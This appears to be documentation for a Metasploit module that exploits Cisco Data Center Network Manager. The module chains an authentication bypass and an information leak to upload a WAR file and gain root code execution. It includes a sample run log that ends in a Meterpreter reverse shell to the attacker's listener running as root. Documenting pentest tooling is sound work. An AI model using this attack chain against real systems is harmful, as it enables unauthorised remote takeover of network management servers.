h00die
1.5 KiB
1.5 KiB
Vulnerable Application
Cisco Data Center Network Manager exposes a file upload servlet (FileUploadServlet) at /fm/fileUpload. An authenticated user can abuse this servlet to upload a WAR to the Apache Tomcat webapps directory and achieve remote code execution as root.
This module exploits two other vulnerabilities, CVE-2019-1619 for authentication bypass on versions 10.4(2) and below, and CVE-2019-1622 (information disclosure) to obtain the correct directory for the WAR file upload.
The module was tested on the DCNM Linux virtual appliance 10.4(2), 11.0(1) and 11.1(1), and should work on a few versions below 10.4(2). Only version 11.0(1) requires authentication to exploit (see References to understand why).
Scenarios
Setup RHOST, LHOST, LPORT, run it and sit back!
[*] Started reverse TCP handler on 10.75.1.1:4444
[+] 10.75.1.40:443 - Detected DCNM 11.1(1)
[*] 10.75.1.40:443 - No authentication required, ready to exploit!
[+] 10.75.1.40:443 - Obtain WAR path from logs: /usr/local/cisco/dcm/wildfly-10.1.0.Final/standalone/sandeployments
[*] 10.75.1.40:443 - Uploading payload...
[+] 10.75.1.40:443 - WAR uploaded, waiting a few seconds for deployment...
[*] 10.75.1.40:443 - Executing payload...
[*] Sending stage (53867 bytes) to 10.75.1.40
[*] Meterpreter session 1 opened (10.75.1.1:4444 -> 10.75.1.40:60592) at 2019-08-29 12:41:49 +0700
meterpreter > getuid
Server username: root
meterpreter > exit
[*] Shutting down Meterpreter...
[*] 10.75.1.40 - Meterpreter session 1 closed. Reason: User exit